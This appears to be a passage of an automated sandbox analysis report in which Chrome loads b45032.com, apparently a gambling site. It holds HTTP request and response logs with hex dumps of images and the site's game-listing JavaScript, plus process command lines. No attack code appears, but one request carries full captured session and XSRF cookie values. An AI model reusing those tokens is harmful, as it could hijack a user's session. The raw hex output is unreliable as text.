                                                      2025-01-12 23:48:18 UTC4096INData Raw: 2e 1c 2d b8 28 dd ae 6d 7d cb 44 05 c8 b2 8c b0 bd b8 38 05 74 e7 79 b9 09 f5 5f f0 bc 6a 4c 27 88 c4 51 85 c3 06 1e bf 2f 07 dd 60 1f c4 e0 fb ac 03 c0 f7 86 8c b2 bf 5f 05 24 78 db a0 a9 6c 82 de e5 4f eb e7 8e 3b b6 3e df e1 70 7d d0 80 38 c6 ce 0a 82 a0 69 63 96 1c 61 a7 ac 2a ad 7a ba 61 46 e8 3f 4b 64 a2 8c 3d fa 6a b0 dc 8f 6a 86 40 ce 54 a1 a5 9e c5 e3 a2 ce 92 af a3 65 4c 50 d5 f3 9b 88 5f ca e0 b7 bf 47 66 8f 79 4f 3e ae 99 86 63 f1 19 05 6d 4a a7 bb 0d cf 53 45 d7 46 a6 99 b9 f6 58 dd 16 e2 1a 58 5f 1e 5d ae 0b ff 00 1e 60 e5 d7 19 5d 7e 56 0f ba 63 70 99 a9 a2 71 03 2d 97 09 f3 86 4b 2c ef cb b0 a1 26 0a 4a 9e 48 a7 b3 87 7d db d3 c7 9b 6c 6f 3a bd a9 f5 0d 33 e8 f9 d8 6e a2 82 31 45 1c ee b9 64 38 46 15 c2 28 c9 4d 3a d1 c6 ed 34 9d 9a b9 0f
                                                      Data Ascii: .-(m}D8ty_jL'Q/`_$xlO;>p}8ica*zaF?Kd=jj@TeLP_GfyO>cmJSEFXX_]`]~Vcpq-K,&JH}lo:3n1Ed8F(M:4
                                                      2025-01-12 23:48:18 UTC4096INData Raw: 2c 33 35 97 b2 2f 6c 69 0e 87 fc 89 4b 76 d9 e4 1d 8c 10 95 b0 2d 07 73 a4 1e 55 ac fa 68 74 ab 02 e0 3a ca 93 93 f0 f1 2f 1d d9 63 fe 4b 58 33 30 4a ec 32 1f 26 3a e0 3b cc 71 fe cc ee 64 62 2e 4b 5a c0 1f 42 93 5d 08 7b c0 8e 27 02 0f 61 0d 0a a8 6b e0 c9 35 58 31 19 e0 94 5f a5 fa ba 79 8e 09 28 a0 b5 af 47 e0 0d ba c5 bb c6 5b 40 77 8f 0d d5 cc 3f 56 7a 1f e9 6a 95 68 66 c9 4d df 59 46 ba 83 00 cc 25 15 c9 aa 80 e8 9b 40 09 41 76 22 34 d3 d7 17 ca 13 20 52 40 7a fd c2 e0 31 fb 30 60 71 23 3b 48 d9 74 d1 11 a2 5a 20 1d 36 20 d1 32 8c db ec fe e5 fb aa 03 03 ae 4c 7b 58 81 ae a0 ac bd 34 72 63 df b0 9c 7f b6 3b cb 9d 61 96 a3 a8 46 05 5c d5 0a d0 65 13 be 56 69 13 46 b0 3d d8 87 38 61 db e8 4c 14 9e f0 17 8c 98 5e 2d 7f a7 2d 38 9b ad d4 8b fe 5c a5 39
                                                      Data Ascii: ,35/liKv-sUht:/cKX30J2&:;qdb.KZB]{'ak5X1_y(G[@w?VzjhfMYF%@Av"4 R@z10`q#;HtZ 6 2L{X4rc;aF\eViF=8aL^--8\9
                                                      2025-01-12 23:48:18 UTC4096INData Raw: 53 76 66 7e 1b 19 f8 30 8d e3 5b 77 06 45 0f 1c dc 0d b8 7d 0e 4d 72 7d 8c 29 b3 6a c8 2e 15 65 f4 01 12 48 72 af 07 61 ff 00 20 d4 28 23 25 4d 33 e5 80 99 3a 37 1b 74 fe 6b 88 c1 96 a8 a8 d3 dc 50 2b 15 82 fc cc 2b 52 ff 00 ca 96 9e ab 64 dd 77 78 83 c8 02 c1 dd 29 af ee 17 be 0e 23 1d b1 0a f6 65 24 71 4b 4e 1c 91 4a a0 5b 93 76 65 1c 99 f8 08 41 f9 6c e6 33 37 60 12 af 33 bb 13 9c 82 0d 32 ee 1f 32 cc 37 10 2d c7 63 14 9a 55 cd 75 f1 19 b7 79 76 95 1a f1 05 94 cb 52 ea 84 b5 6b a9 1b 7d 4c ac 1b 61 58 ee fc c2 2c f3 b6 86 ae bb 23 1f a3 65 02 ee e5 ed 1d 9f 0f 4e d2 c5 aa b4 85 57 d1 61 ed 55 79 de 2f ec 83 78 95 6b f0 57 51 bc c5 55 15 d9 9a d9 f6 63 f7 fe c6 86 da 36 a6 bc 5f a8 ca 43 51 f2 85 f0 d9 0e 63 12 b6 35 4d e0 7a 0e 87 11 7a 53 36 5b 3b 7a
                                                      Data Ascii: Svf~0[wE}Mr})j.eHra (#%M3:7tkP++Rdwx)#e$qKNJ[veAl37`3227-cUuyvRk}LaX,#eNWaUy/xkWQUc6_CQc5MzzS6[;z
                                                      2025-01-12 23:48:18 UTC2731INData Raw: 93 40 58 5a 5e a1 c4 5c 3b 8f ee 19 78 87 2a 36 6c c7 30 86 ed db a8 2b 86 e3 cd d5 f8 a2 3d 5b 58 6f 96 d8 1a 7c b8 cf 51 7d 09 3d 16 8b 82 cd 77 3f 5a 93 53 6d 0c 9a 63 6f e5 b8 70 5a 0f 0e 08 b8 1b 51 f7 df 8f 2a 6b 60 f5 e4 8c d0 1f c6 ac 2e 21 76 76 77 b3 cd 2b 1d f1 dc 8c 7b 0c 8d 3d 69 a6 b7 f9 52 f6 85 c5 cd 86 67 c1 8a d6 b1 95 fb a2 94 f3 be 79 09 28 02 2d 01 f7 85 e1 a0 93 d9 64 6b 51 63 f7 db ea 14 1a de 34 af d8 df ce c2 c6 cd 60 77 3b 0d 52 c2 f6 9b 3e 8c da 12 72 d7 7b 59 7e d9 33 32 c8 1e 71 23 ea 16 07 b5 4c a0 39 5d 21 3b 77 2b 2b da 8e 6b 5e 09 93 e1 3f 34 ef 6c 39 85 dc a2 4d 9a 7d 7b ac 5f 6b 59 b9 32 ff 00 cc dc 74 df 64 ff 00 68 fa b4 ec 75 9a bf e4 b5 be 29 66 44 ee 32 be be a5 7e b1 e1 b4 50 70 fe 7d 50 e2 4c 4f fc c7 f3 58 da c4
                                                      Data Ascii: @XZ^\;x*6l0+=[Xo|Q}=w?ZSmcopZQ*k`.!vvw+{=iRgy(-dkQc4`w;R>r{Y~32q#L9]!;w++k^?4l9M}{_kY2tdhu)fD2~Pp}PLOX


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      145192.168.2.44989520.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:18 UTC626OUTGET /images_plus/egame/nav/91_egame_logo.png?ver=1606790110 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:48:18 UTC355INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:18 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 3366
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:10 GMT
                                                      ETag: "5fc5abde-d26"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: MISS
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:48:18 UTC3366INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 18 00 00 01 18 08 03 00 00 00 b0 50 19 be 00 00 01 14 50 4c 54 45 00 00 00 fc bc 0c fa af 11 fa ad 12 f9 a6 15 fa ac 12 fd d4 00 fb bb 0b fd d4 01 fb bb 0c fd d4 00 fd d5 00 f9 a6 15 fd d5 00 f9 a3 17 fd d3 01 fd d5 00 fa ae 12 f9 a6 15 fd d4 00 59 59 5c f9 ac 13 fd d5 00 59 59 5c fd d4 00 f9 a9 14 fa ad 12 f9 a4 16 fa a9 14 fb b7 0e fb b7 0d 59 59 5c fd d4 01 fd d5 00 fd ce 02 59 59 5c f8 a2 18 fd d1 02 f8 a4 17 f9 a5 16 59 59 5c fd d5 00 59 59 5c f9 ab 13 fa b2 10 f9 ac 13 59 59 5c 59 59 5c 59 59 5c fa b5 0e fa b0 11 59 59 5c 59 59 5c 59 59 5c 59 59 5c 59 59 5c fa b7 0e fc ca 05 f8 a2 17 f9 ae 12 fb b8 0d fc c1 08 fa b5 0f fb b9 0d fd cf 02 fc c4 07 fb c2 08 fb b9 0d fc cc 04 59 59 5c f9 a7 15 fc
                                                      Data Ascii: PNGIHDRPPLTEYY\YY\YY\YY\YY\YY\YY\YY\YY\YY\YY\YY\YY\YY\YY\


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      146192.168.2.44989820.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:18 UTC385OUTGET /plus/js/unite/egame_unite.js?ver=1723802385 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:48:18 UTC318INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:18 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 12444
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Fri, 16 Aug 2024 09:59:45 GMT
                                                      ETag: "66bf2311-309c"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:48:18 UTC3778INData Raw: 76 61 72 20 66 61 76 6f 72 69 74 65 3d 5b 5d 3b 0a 76 61 72 20 74 69 6d 65 5f 6a 61 63 6b 70 6f 74 3b 0a 76 61 72 20 67 61 6d 65 6e 61 6d 65 5f 73 72 65 61 63 68 3d 27 27 3b 0a 76 61 72 20 65 67 61 6d 65 5f 75 6e 69 74 65 20 3d 7b 0a 20 20 20 20 63 61 6c 6c 62 61 63 6b 5f 67 61 6d 65 5f 63 61 74 3a 27 27 2c 0a 20 20 20 20 67 65 74 63 61 74 6c 69 73 74 3a 66 75 6e 63 74 69 6f 6e 28 70 6c 61 74 66 6f 72 6d 2c 65 67 61 6d 65 5f 66 69 6c 74 65 72 29 7b 0a 20 20 20 20 20 20 24 2e 67 65 74 28 27 2f 67 65 74 63 61 74 6c 69 73 74 2f 27 2b 70 6c 61 74 66 6f 72 6d 2c 27 27 2c 66 75 6e 63 74 69 6f 6e 28 6f 62 6a 29 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 73 74 72 3d 27 27 3b 0a 20 20 20 20 20 20 20 20 24 2e 65 61 63 68 28 6f 62 6a 2c 66 75 6e 63 74 69 6f 6e 28 6b
                                                      Data Ascii: var favorite=[];var time_jackpot;var gamename_sreach='';var egame_unite ={ callback_game_cat:'', getcatlist:function(platform,egame_filter){ $.get('/getcatlist/'+platform,'',function(obj){ var str=''; $.each(obj,function(k
                                                      2025-01-12 23:48:18 UTC4096INData Raw: 2b 27 3c 2f 64 69 76 3e 5c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 5c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 6f 64 54 65 78 74 57 72 61 70 70 65 72 22 3e 5c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 2b 72 61 74 69 6e 67 2b 27 5c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 6f 64 43 61 74 65 67 6f 72 79 22 3e 27 2b 76 2e 63 6f 64 65 2b 27 3c 2f 64 69 76 3e 5c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 6f 64 4e 61 6d 65 22
                                                      Data Ascii: +'</div>\ </div>\ <div class="PodTextWrapper">\ '+rating+'\ <div class="PodCategory">'+v.code+'</div>\ <div class="PodName"
                                                      2025-01-12 23:48:18 UTC4096INData Raw: 72 20 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 6c 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6e 75 6d 5f 61 72 72 2e 75 6e 73 68 69 66 74 28 22 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 5f 6e 75 6d 73 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 20 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 74 68 69 73 29 2e 74 65 78 74 28 6e 75 6d 5f 61 72 72 5b 6e 5d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 2c 0a 20 20 20 20 67 65 74 50 54 6a 61 63 6b 70 6f 74 3a 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 24 2e 67 65 74 28 27 2f 70 74 6a 61 63 6b 70 6f 74 27
                                                      Data Ascii: r (var i = 0; i < l; i++) { num_arr.unshift(""); } $(_nums).each(function(n, e) { $(this).text(num_arr[n]); }); }); }, getPTjackpot:function() { $.get('/ptjackpot'
                                                      2025-01-12 23:48:18 UTC474INData Raw: 29 2b 27 22 3e e2 80 ba 3c 2f 61 3e 3c 2f 6c 69 3e 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 6c 73 65 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 67 65 73 74 72 2b 3d 27 3c 6c 69 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 69 74 65 6d 20 64 69 73 61 62 6c 65 64 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6c 69 6e 6b 22 3e c2 bb 3c 2f 73 70 61 6e 3e 3c 2f 6c 69 3e 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a e5 88 b0 e6 9c 80 e5 90 8e e4 b8 80 e9 a1 b5 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 64 61 74 61 2e 63 75 72 72 65 6e 74 5f 70 61 67 65 20 21 3d 20 64 61 74 61 2e 6c 61 73 74 5f 70 61 67 65 29 7b 0a 20 20 20 20 20 20
                                                      Data Ascii: )+'"></a></li>'; } else{ pagestr+='<li class="page-item disabled"><span class="page-link"></span></li>'; } /**/ if(data.current_page != data.last_page){


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      147192.168.2.449901154.86.18.44434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:18 UTC1334OUTGET /images_plus/other/en/right3.jpg HTTP/1.1
                                                      Host: b45032.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/egame/224
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; XSRF-TOKEN=eyJpdiI6IjBsZDJ0a3hCTDBuSGhDNTBORFFUcVE9PSIsInZhbHVlIjoiWVNaU2xVRXhZVjF6TW1kbytmUTV1UkVIRmRVNkJnQUFJdWhGYUVLNm51M2VBZ3F4UHYxd1ZJZUlnUXcwdnF2MkZrUWZJdHFoU25zTHl4UHN4VFJxY0E9PSIsIm1hYyI6IjllMGQ3NmU3NmRmZjVlYzczZmMyYjU3NjllNmM3NTVkOTkxMzk2ODRkZTcyOGUwZDEzZmQ5MTFmN2Q5NDI0OTgifQ%3D%3D; vanguard_session=eyJpdiI6InNHR2l3SDRCenJrYmtUSTYrT0dDeVE9PSIsInZhbHVlIjoiSVJsSktTWllHVVlkMHNqbmNyNXZwOFE0bDR6WnVObWRMK0ZOWWVVQll5XC90YnhhVmJNRG8xUXdNMGgySHVlOWZOSUJKZUpROTdcLzJlZXA2OU5NN21rZz09IiwibWFjIjoiM2NlZWI4ZDFmMjAyNDA5MjE5OWYxZGMwNjQ5YmM5MzJhMzViN2ViMTY1ODUwYjkzOGQ4OTVlMmVmMmEzM2Y0MSJ9
                                                      2025-01-12 23:48:18 UTC431INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:18 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 8547
                                                      Connection: close
                                                      Alt-Svc: h3="67e285f0.t74nx2b2.com:443";ma=604800;persist=1,h2="bt5.tuf3a353.com:443";ma=604800;persist=1
                                                      Last-Modified: Mon, 29 May 2023 06:54:07 GMT
                                                      ETag: "64744c0f-2163"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      X-Cache-Status: HIT
                                                      Server: nginx
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:48:18 UTC8547INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 06 04 04 04 05 04 06 05 05 06 09 06 05 06 09 0b 08 06 06 08 0b 0c 0a 0a 0b 0a 0a 0c 10 0c 0c 0c 0c 0c 0c 10 0c 0e 0f 10 0f 0e 0c 13 13 14 14 13 13 1c 1b 1b 1b 1c 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 01 07 07 07 0d 0c 0d 18 10 10 18 1a 15 11 15 1a 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f ff c0 00 11 08 00 fa 00 8c 03 01 11 00 02 11 01 03 11 01 ff c4 00 ab 00 01 00 00 07 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 01 01 00 03 01 01 01 00 00
                                                      Data Ascii: ExifII*Ducky<Adobed


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      148192.168.2.44989920.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:18 UTC626OUTGET /images_plus/egame/nav/61_egame_logo.png?ver=1606790110 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:48:18 UTC355INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:18 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 2587
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:10 GMT
                                                      ETag: "5fc5abde-a1b"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: MISS
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:48:18 UTC2587INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 18 00 00 01 18 08 03 00 00 00 b0 50 19 be 00 00 00 33 50 4c 54 45 00 00 00 b9 13 1a b9 13 1a b9 13 1a b9 13 1a b9 13 1a b9 13 1a b9 13 1a b9 13 1a b9 13 1a b9 13 1a b9 13 1a b9 13 1a b9 13 1a b9 13 1a b9 13 1a b9 13 1a dc 7c 79 93 00 00 00 10 74 52 4e 53 00 10 f0 d0 c0 40 80 a0 30 60 20 e0 50 b0 90 70 10 ee 73 a2 00 00 09 87 49 44 41 54 78 da ec c1 21 01 00 00 00 02 20 fd 7f da 13 46 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 d0 86 b1 67 2e 49 0e 83 30 10 45 12 36 f2 17 ee 7f da 49 25 1b 8b 76 32 71 e2 45 00 f7 6e 3e 55 13 bf 69 b5 1a bc a3 99 79 76 97 72 d1 92 6e 5a 2e d3 80 5d d2 5d 97 69 d0 2e 37 5d a6 d9 b7 cb 65 9a 5d bb 5c a6 b1 ea a6 04 9a 3a d7 bc fa b4 ab de b5 ad 51 d2 13 c9 e8 1a 96
                                                      Data Ascii: PNGIHDRP3PLTE|ytRNS@0` PpsIDATx! F g.I0E6I%v2qEn>UiyvrnZ.]]i.7]e]\:Q


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      149192.168.2.44990020.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:18 UTC627OUTGET /images_plus/egame/nav/202_egame_logo.png?ver=1673549406 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:48:18 UTC356INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:18 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 5519
                                                      Connection: close
                                                      Last-Modified: Thu, 12 Jan 2023 18:50:06 GMT
                                                      ETag: "63c0565e-158f"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: MISS
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:48:18 UTC3740INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 18 00 00 01 18 08 03 00 00 00 b0 50 19 be 00 00 02 43 50 4c 54 45 00 00 00 00 00 00 3f 3f 3f 0a 09 03 3f 3f 3f 00 00 00 87 76 1c a2 96 24 01 01 01 12 10 04 51 50 17 00 00 00 66 5d 15 70 70 70 02 02 02 6d 60 17 3f 39 0e 30 2c 0b 64 57 15 39 32 0c 18 19 19 0f 10 10 00 00 00 95 95 95 83 73 1c df df df 2c 2d 2d 29 25 09 cf cf cf 92 8e 2d ac 98 24 64 65 65 22 1f 08 b5 a2 25 57 4d 12 21 21 21 af 9c 26 81 84 84 77 6b 1d 7d 6e 1b 4d 45 11 47 3f 0f 00 00 00 2e 2e 2e 99 99 99 97 86 1e 52 53 53 1a 18 06 10 10 10 4e 4e 4e 9a 9b 9b 8a 8d 8d 8d 7c 1e 6b 6d 6d 1b 1b 1b c6 c6 c6 b4 b8 b8 a1 a3 a3 92 94 94 6f 6f 6f 7b 7b 7b 7f 7f 7f a8 aa aa 72 66 18 4a 4c 4c 00 00 00 2d 2d 2d b3 b3 b3 ba ba ba af b1 b1 56 56 56 ca
                                                      Data Ascii: PNGIHDRPCPLTE??????v$QPf]pppm`?90,dW92s,--)%-$dee"%WM!!!&wk}nMEG?...RSSNNN|kmmooo{{{rfJLL---VVV
                                                      2025-01-12 23:48:18 UTC1779INData Raw: 47 a3 73 c1 99 27 07 84 fa 16 6e 84 74 38 ba 66 35 61 3a 46 3c cd 1e 20 ab 9c 72 89 85 60 ab 65 49 69 3c 38 40 d2 81 a5 e2 52 a7 d1 b6 e6 81 29 af 31 10 09 2b e1 c4 2a 29 96 6e c6 f5 07 4f 23 45 a6 22 ba 90 fd c7 8e 2d 32 d7 d7 28 16 4c 05 67 57 24 1f 5e 4c 56 cd 05 6e 81 54 3a 96 76 fa 7c fd d9 7a d1 2c cb 74 64 96 db df 74 5e 01 0f d6 48 93 9c c1 6f 07 e4 c7 03 bb 81 c5 8c c8 3e 58 35 24 63 f1 60 b5 f5 36 47 c2 ba 08 f7 54 d1 dd 44 a5 32 7a 60 7f 34 00 d4 62 2e 1c 0a 6e 98 cc 81 cf c1 6a 29 56 22 9e 23 b1 f1 bd f0 62 12 b1 be 62 13 cd e9 d0 9a 5f b4 45 bd d4 5c 2b c2 09 17 b9 60 79 71 ae 49 a6 74 5f d7 d5 86 01 4c 44 28 00 a9 41 67 32 38 48 95 66 4f 0c 68 ab 75 22 ac 5c 4c 46 e3 ba 91 9f 8d a2 71 6e 31 22 7b 2d 68 86 e9 01 8b cf f1 a1 e3 e3 fb 31 33 f6
                                                      Data Ascii: Gs'nt8f5a:F< r`eIi<8@R)1+*)nO#E"-2(LgW$^LVnT:v|z,tdt^Ho>X5$c`6GTD2z`4b.nj)V"#bb_E\+`yqIt_LD(Ag28HfOhu"\LFqn1"{-h13


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:18:47:25
                                                      Start date:12/01/2025
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                      Imagebase:0x7ff76e190000
                                                      File size:3'242'272 bytes
                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:2
                                                      Start time:18:47:26
                                                      Start date:12/01/2025
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2320,i,16585267306971853294,6447281845026543591,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                      Imagebase:0x7ff76e190000
                                                      File size:3'242'272 bytes
                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:3
                                                      Start time:18:47:34
                                                      Start date:12/01/2025
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://b45032.com/"
                                                      Imagebase:0x7ff76e190000
                                                      File size:3'242'272 bytes
                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                      Has elevated privileges:true
